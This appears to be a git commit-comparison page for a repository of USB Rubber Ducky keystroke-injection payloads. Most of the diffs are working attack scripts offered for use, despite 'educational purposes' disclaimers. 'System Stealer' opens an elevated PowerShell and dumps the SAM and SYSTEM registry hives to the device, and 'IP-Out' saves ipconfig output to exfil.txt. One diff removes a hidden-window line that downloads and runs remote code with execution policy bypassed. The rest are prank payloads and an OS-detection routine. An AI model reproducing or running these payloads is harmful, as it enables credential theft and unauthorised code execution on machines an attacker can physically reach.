Compare commits
32 Commits
30fa227ef9
...
cfe165d0c3
| Author | SHA1 | Date |
|---|---|---|
DIYS.py
|
cfe165d0c3 | |
Peaks
|
a8c264c752 | |
UberGuidoZ
|
a18f4561e2 | |
|
UberGuidoZ
|
ad644d8849 | |
|
UberGuidoZ
|
8c3110d8f1 | |
|
UberGuidoZ
|
a94beb0c75 | |
|
UberGuidoZ
|
467075df68 | |
|
UberGuidoZ
|
e3c28b36ee | |
|
Peaks
|
44af31e74b | |
Mavis Coffey
|
cacb21ad7e | |
|
Mavis Coffey
|
61eb88ab6c | |
|
Mavis Coffey
|
8be0f9a092 | |
|
Mavis Coffey
|
63e0c18618 | |
|
Mavis Coffey
|
81807425f5 | |
|
Mavis Coffey
|
083951025f | |
|
Mavis Coffey
|
1a5aa0bd08 | |
|
Mavis Coffey
|
a323fc3281 | |
|
UberGuidoZ
|
b2c8194099 | |
|
UberGuidoZ
|
97745c360d | |
|
Mavis Coffey
|
420a174f93 | |
|
Mavis Coffey
|
c8c6a75d33 | |
|
Mavis Coffey
|
4e89426355 | |
|
Mavis Coffey
|
566683c428 | |
|
Mavis Coffey
|
5ed41467e3 | |
|
Mavis Coffey
|
a74d21e848 | |
|
Mavis Coffey
|
0f85a6936e | |
|
Mavis Coffey
|
d9baab6395 | |
|
Mavis Coffey
|
cf0c83d37c | |
|
Mavis Coffey
|
8293bf5d4d | |
|
Mavis Coffey
|
6ad0b7836c | |
|
mavisinator30001
|
8073d4d9cd | |
|
DIYS.py
|
8e78d2783f |
|
|
@ -0,0 +1,12 @@
|
|||
# IP-OUT
|
||||
This is a USB Rubber Ducky payload that opens a powershell window in the target (Windows based) computer, then extracts the `ipconfig` information in the form of a text file saved on the USB.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
## Useful Tips
|
||||
|
||||
**Change #DRIVELABEL to your own personal drive label if it isn't already**
|
||||
|
||||
Remember: Do not use this for unethical hacking practices! This is for educational purposed only!
|
||||
|
|
@ -0,0 +1,63 @@
|
|||
REM Title: IP-Out
|
||||
REM Author: Mavisinator30001
|
||||
REM Description: Opens a powershell window and prints the current IP of the device to a text file in the BadUSB
|
||||
REM Target: Any Windows System
|
||||
REM DISCLAIMER!!! Neither I, nor Hak5, condone any unethical hacking practices using this payload... FOR EDUCATIONAL PURPOSES ONLY
|
||||
DEFINE #DRIVELABEL DUCKY
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
IF $_OS != WINDOWS
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 300
|
||||
STRINGLN Powershell
|
||||
DELAY 1000
|
||||
STRINGLN $driveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_Volume WHERE Label='#DRIVELABEL'").DriveLetter; if ($driveLetter) { ipconfig | Out-File -Filepath "$driveLetter\exfil.txt" -Encoding utf8 }
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
ALT F4
|
||||
ATTACKMODE OFF
|
||||
HIDE_PAYLOAD
|
||||
|
|
@ -0,0 +1,74 @@
|
|||
REM TITLE System Stealer
|
||||
REM AUTHOR mavisinator30001
|
||||
REM DESCRIPTION Creates a file in the Duck called sam.save and system.save with encrypted system information in both
|
||||
REM DISCLAIMER Neither I, nor Hak5, condone any unethical hacking practices, whether taken from this payload or otherwise!
|
||||
REM DISCLAIMER This is for educational purposes ONLY
|
||||
DELAY 1000
|
||||
ATTACKMODE HID STORAGE
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
REM Change $DRIVELABEL to the storage label of your duck
|
||||
DEFINE #DRIVELABEL DUCKY
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
DELAY 1000
|
||||
CTRL-SHIFT-ENTER
|
||||
DELAY 750
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
|
||||
DELAY 250
|
||||
STRINGLN reg save HKLM\sam $DriveLetter/sam.save
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
STRINGLN reg save HKLM\system $DriveLetter/system.save
|
||||
WAIT_FOR_STORAGE_ACTIVITY
|
||||
WAIT_FOR_STORAGE_INACTIVITY
|
||||
ALT F4
|
||||
ELSE
|
||||
ATTACKMODE OFF
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
|
|
@ -0,0 +1,5 @@
|
|||
## 1 Script to Rule Them All
|
||||
|
||||
The purpose of this frankenstein mess is to use OS detection to run conditional code after, specific to the OS.
|
||||
|
||||
It differs from just combining the two extensions in very few ways, but there are slight improvement tweaks from my own testing (hence the new name to avoid conflicts) and more documentation on the process within.
|
||||
|
|
@ -0,0 +1,293 @@
|
|||
REM Title: One Script To Rule Them All
|
||||
REM Author: Korben and UberGuidoZ
|
||||
REM Description: Attempt to detect OS then run conditional code based on result.
|
||||
REM Target: Windows, macOS, Linux, iOS, ChromeOS, Android, plus custom OS.
|
||||
REM Version: 1.6
|
||||
REM Category: All of them
|
||||
REM Source: https://github.com/UberGuidoZ/Hak5-USBRubberducky-Payloads
|
||||
|
||||
EXTENSION OS_DETECTION_UBER
|
||||
REM VERSION 2.0
|
||||
REM AUTHOR: Korben and UberGuidoZ
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USB Rubber Ducky Host OS Detection (moving target, may fall)
|
||||
Results may vary greatly depending on a combination of many variables:
|
||||
- number of testing stages
|
||||
- specific devices and versions tested against
|
||||
- number of systems testing for (scope)
|
||||
- detection techniques (passive/invisible/active/hybrid)
|
||||
- overall speed
|
||||
- overall accuracy
|
||||
|
||||
If all you require is Windows vs <any other os> detection, the PASSIVE_WINDOWS_DETECT extension is recommended over this one.
|
||||
|
||||
TARGET:
|
||||
DEFAULT - Windows, Mac, Linux
|
||||
ADVANCED_DETECTION - Windows, Mac, Linux, iOS, ChromeOS, Android, custom defined OS
|
||||
|
||||
USAGE:
|
||||
Call DETECT_OS_UBER() anywhere in your payload after the extension.
|
||||
Place this extension and the DETECT_OS_UBER() before you would like to first reference $_OS to execute payload code conditionally.
|
||||
|
||||
FEEDBACK:
|
||||
As mentioned above, this a moving target (especially for macOS).
|
||||
Please report any issues identifying specific operating systems with as much detail as possible.
|
||||
Your feedback will greatly help solidify the robustness of this extension and others based on it.
|
||||
|
||||
DEBUGGING:
|
||||
SET DEBUGGING_OUTPUT DEFINE to TRUE, deploy on a target with text editor open for debug output
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION
|
||||
|
||||
REM For Debugging (use if troubleshooting or reporting issues):
|
||||
DEFINE #DEBUGGING_OUTPUT FALSE
|
||||
DEFINE #ADVANCED_DETECTION FALSE
|
||||
|
||||
REM Timing fine tuning:
|
||||
DEFINE #STARTUP_DELAY 1500
|
||||
DEFINE #RESTART_WAIT 1000
|
||||
DEFINE #EXECUTE_DELAY 2000
|
||||
DEFINE #CONNECT_WAIT 1000
|
||||
DEFINE #OS_DETECT_MODE HID
|
||||
REM Define Apple keyboard to keep macOS happy
|
||||
DEFINE #OS_DETECT_VID VID_05AC
|
||||
DEFINE #OS_DETECT_PID PID_021E
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #HOST_RESPONSE_TIMEOUT 1000
|
||||
|
||||
REM Start DETECT_OS function
|
||||
FUNCTION DETECT_OS_UBER()
|
||||
$_HOST_CONFIGURATION_REQUEST_COUNT = 0
|
||||
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
|
||||
DELAY #STARTUP_DELAY
|
||||
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||
|
||||
REM Debugging if TRUE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
IF_DEFINED_TRUE #ADVANCED_DETECTION
|
||||
STRING ADVANCED OS DETECT
|
||||
ELSE_DEFINED
|
||||
STRING OS DETECT
|
||||
END_IF_DEFINED
|
||||
ENTER
|
||||
STRING test caps
|
||||
END_IF_DEFINED
|
||||
|
||||
IF ($_CAPSLOCK_ON == FALSE) THEN
|
||||
LED_R
|
||||
CAPSLOCK
|
||||
DELAY #HOST_RESPONSE_TIMEOUT
|
||||
END_IF
|
||||
LED_OFF
|
||||
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING test done
|
||||
END_IF_DEFINED
|
||||
|
||||
IF $_RECEIVED_HOST_LOCK_LED_REPLY THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING received led response
|
||||
END_IF_DEFINED
|
||||
LED_G
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Prediction: Windows
|
||||
END_IF_DEFINED
|
||||
$_OS = WINDOWS
|
||||
ELSE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Prediction: Linux
|
||||
END_IF_DEFINED
|
||||
$_OS = LINUX
|
||||
END_IF
|
||||
ELSE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING No LED response
|
||||
ENTER
|
||||
STRING Prediciton: MacOS
|
||||
END_IF_DEFINED
|
||||
$_OS = MACOS
|
||||
END_IF
|
||||
|
||||
IF_DEFINED_TRUE #ADVANCED_DETECTION
|
||||
IF ( $_OS == LINUX ) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Soft reconnect
|
||||
END_IF_DEFINED
|
||||
ATTACKMODE OFF
|
||||
DELAY #RESTART_WAIT
|
||||
ATTACKMODE #OS_DETECT_MODE #OS_DETECT_VID #OS_DETECT_PID
|
||||
DELAY #CONNECT_WAIT
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Reconnected
|
||||
END_IF_DEFINED
|
||||
IF ($_CAPSLOCK_ON == TRUE) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Caps LED on
|
||||
ENTER
|
||||
STRING Test numlock
|
||||
END_IF_DEFINED
|
||||
NUMLOCK
|
||||
DELAY #HOST_RESPONSE_TIMEOUT
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Test done
|
||||
END_IF_DEFINED
|
||||
IF ($_NUMLOCK_ON == FALSE) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING No numlock LED
|
||||
ENTER
|
||||
STRING Prediciton: ChromeOS
|
||||
END_IF_DEFINED
|
||||
$_OS = CHROMEOS
|
||||
ELSE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Numlock LED on
|
||||
ENTER
|
||||
STRING Testing scrolllock
|
||||
END_IF_DEFINED
|
||||
SCROLLLOCK
|
||||
DELAY #HOST_RESPONSE_TIMEOUT
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Test done
|
||||
END_IF_DEFINED
|
||||
IF ($_SCROLLLOCK_ON == TRUE) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Scrolllock LED on
|
||||
ENTER
|
||||
STRING Prediciton: Android
|
||||
END_IF_DEFINED
|
||||
$_OS = ANDROID
|
||||
ELSE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING No scrolllock reply
|
||||
ENTER
|
||||
STRING Prediction: Linux
|
||||
END_IF_DEFINED
|
||||
$_OS = LINUX
|
||||
END_IF
|
||||
END_IF
|
||||
END_IF
|
||||
ELSE IF ($_OS == MACOS) THEN
|
||||
IF ($_CAPSLOCK_ON == TRUE) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Caps LED on
|
||||
ENTER
|
||||
STRING Prediction: iOS
|
||||
END_IF_DEFINED
|
||||
$_OS = IOS
|
||||
ELSE
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING No caps reply
|
||||
ENTER
|
||||
STRING Prediction: MacOS
|
||||
END_IF_DEFINED
|
||||
$_OS = MACOS
|
||||
END_IF
|
||||
ELSE IF ($_OS == WINDOWS) THEN
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING Confident Windows Prediction
|
||||
END_IF_DEFINED
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
END_IF_DEFINED
|
||||
|
||||
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
||||
|
||||
IF_DEFINED_TRUE #DEBUGGING_OUTPUT
|
||||
ENTER
|
||||
STRING OS_DETECT complete
|
||||
ENTER
|
||||
END_IF_DEFINED
|
||||
END_FUNCTION
|
||||
END_EXTENSION
|
||||
|
||||
EXTENSION HELLO_OS_UBER
|
||||
REM VERSION 2.0
|
||||
REM AUTHOR: Korben and UberGuidoZ
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
USAGE:
|
||||
For use with OS_DETECTION_UBERExtension, call HELLO_OS_UBER()
|
||||
after DETECT_OS_UBER() prints the OS determination. Make sure
|
||||
your custom conditional code is inserted below where commented.
|
||||
END_REM
|
||||
|
||||
REM Defining custom $_OS enums if desired
|
||||
DEFINE #EXTRA_EXAMPLES FALSE
|
||||
DEFINE #SOME_OTHER_OS 6
|
||||
DEFINE #ANOTHER_OS 7
|
||||
|
||||
FUNCTION HELLO_OS_UBER()
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
REM Windows code starts here
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRINGLN notepad
|
||||
DELAY 1000
|
||||
STRINGLN Legit DS3 on Windows
|
||||
REM Windows code ends here
|
||||
ELSE IF ($_OS == MACOS) THEN
|
||||
REM macOS code starts here
|
||||
DELAY 2000
|
||||
GUI SPACE
|
||||
DELAY 500
|
||||
STRINGLN TextEdit
|
||||
STRINGLN Legit DS3 on macOS
|
||||
REM macOS code ends here
|
||||
ELSE IF ($_OS == LINUX) THEN
|
||||
REM Linux code starts here
|
||||
DELAY 2000
|
||||
CTRL ALT t
|
||||
DELAY 100
|
||||
STRINGLN nano
|
||||
STRINGLN Legit DS3 on Linux
|
||||
REM Linux code ends here
|
||||
ELSE IF ($_OS == IOS) THEN
|
||||
REM iOS code starts here
|
||||
REM iOS code ends here
|
||||
ELSE IF ($_OS == CHROMEOS) THEN
|
||||
REM ChromeOS code starts here
|
||||
REM ChromeOS code ends here
|
||||
ELSE IF ($_OS == ANDROID) THEN
|
||||
REM Android code starts here
|
||||
REM Android code ends here
|
||||
IF_DEFINED_TRUE #EXTRA_EXAMPLES
|
||||
ELSE IF($_OS == #SOME_OTHER_OS) THEN
|
||||
REM Custom Other OS code starts here
|
||||
REM Custom Other OS code ends here
|
||||
ELSE IF($_OS == #ANOTHER_OS) THEN
|
||||
REM Another custom Other OS code starts here
|
||||
REM Another custom Other OS code ends here
|
||||
END_IF_DEFINED
|
||||
ELSE
|
||||
REM All else fails code starts here
|
||||
REM All else fails code ends here
|
||||
END_IF
|
||||
END_FUNCTION
|
||||
END_EXTENSION
|
||||
|
||||
REM Do the do! Change delay at beginning if desired.
|
||||
|
||||
DETECT_OS_UBER()
|
||||
DELAY #EXECUTE_DELAY
|
||||
HELLO_OS_UBER()
|
||||
|
|
@ -8,8 +8,7 @@ REM Target: Windows 10, 11
|
|||
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
||||
STRING powershell -w h Add-Type -AssemblyName *m.W*s.F*s;$w=[Windows.Forms.Cursor];$p=$w::Position.X;while(1){if($w::Position.X-ne$p){break}else{Sleep 3}};saps https://youtu.be/sOLIdqpzrW4;sleep 3;$o=New-Object -ComObject WScript.Shell;$o.SendKeys('f')
|
||||
ENTER
|
||||
|
||||
REM Remember to replace the link with your DropBox shared link for the intended file to download
|
||||
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
|
||||
REM Remember to replace the link with the YouTube URL of the video you intend to play
|
||||
|
|
|
|||
|
|
@ -3,10 +3,10 @@ REM Title: Hacker Typer
|
|||
REM Author: UberGuidoZ
|
||||
REM Description: Opens a harmless website and types like a hacker
|
||||
REM Target: Windows but easily modified to work on any OS with a browser
|
||||
REM Version: 1.0
|
||||
REM Version: 1.1
|
||||
REM Category: Prank
|
||||
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
||||
REM
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 1500
|
||||
GUI r
|
||||
DELAY 1000
|
||||
|
|
|
|||
|
|
@ -0,0 +1,5 @@
|
|||
# Resolution Prank
|
||||
|
||||
This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
|
||||
|
||||
### Somewhat resource dependent, may not work on older computers
|
||||
|
|
@ -0,0 +1,103 @@
|
|||
REM TITLE Resolution Prank
|
||||
REM AUTHOR Mavisinator30001
|
||||
REM TARGET Any system running Windows 10/11
|
||||
REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
IF $_OS != WINDOWS
|
||||
STOP_PAYLOAD
|
||||
END_IF
|
||||
LED_G
|
||||
DELAY 500
|
||||
CTRL GUI d
|
||||
DELAY 500
|
||||
GUI i
|
||||
DELAY 2000
|
||||
STRINGLN display
|
||||
DELAY 2500
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
REPEAT 8 TAB
|
||||
ENTER
|
||||
VAR $CAPS_STATE = $_CAPSLOCK_ON
|
||||
WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
|
||||
HOLD DOWN
|
||||
DELAY 1000
|
||||
RELEASE DOWN
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
DELAY 200
|
||||
ENTER
|
||||
|
||||
REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
|
||||
VAR $LIGHT_UP_TIMES = 20
|
||||
WHILE ($LIGHT_UP_TIMES > 0)
|
||||
LED_G
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
LED_R
|
||||
DELAY 300
|
||||
LED_OFF
|
||||
DELAY 300
|
||||
$LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
|
||||
END_WHILE
|
||||
WAIT_FOR_CAPS_CHANGE
|
||||
END_WHILE
|
||||
DELAY 300
|
||||
REPEAT 12 TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
HOLD UP
|
||||
DELAY 1000
|
||||
RELEASE UP
|
||||
ENTER
|
||||
DELAY 200
|
||||
LEFT
|
||||
ENTER
|
||||
DELAY 1000
|
||||
ALT F4
|
||||
DELAY 200
|
||||
CTRL GUI F4
|
||||
|
|
@ -5,9 +5,10 @@ REM
|
|||
REM Description: Creates a batch file that opens a Rick Roll every 5 mins in default browser
|
||||
REM Notes: Creates batch file, starts batch file, minimizes the window
|
||||
REM Target: Windows but fairly easily modified to work on any OS with a browser
|
||||
REM Version: 1.3
|
||||
REM Version: 1.5
|
||||
REM Category: Prank
|
||||
REM Source: https://github.com/UberGuidoZ/OMG-Payloads
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
|
@ -20,6 +21,7 @@ DELAY 1000
|
|||
STRING copy con rr.bat
|
||||
ENTER
|
||||
STRING @ECHO OFF
|
||||
ENTER
|
||||
STRING PING 127.0.0.1 -n 5 > NUL
|
||||
ENTER
|
||||
STRING :LOOP
|
||||
|
|
@ -30,7 +32,7 @@ STRING PING 127.0.0.1 -n 300 > NUL
|
|||
ENTER
|
||||
STRING GOTO LOOP
|
||||
ENTER
|
||||
CTRL C
|
||||
CTRL c
|
||||
DELAY 1000
|
||||
STRING cls && rr.bat
|
||||
ENTER
|
||||
|
|
|
|||
|
|
@ -2,7 +2,8 @@ REM Title: The Matrix Wake Up
|
|||
REM Description: Recreates the Wake Up Neo terminal scene in The Matrix
|
||||
REM Author: UberGuidoZ
|
||||
REM Target: Windows (including Powershell 2.0 or above)
|
||||
|
||||
REM Version: v1.1
|
||||
ATTACKMODE HID STORAGE
|
||||
DELAY 3000
|
||||
GUI r
|
||||
DELAY 750
|
||||
|
|
|
|||
Loading…
Reference in New Issue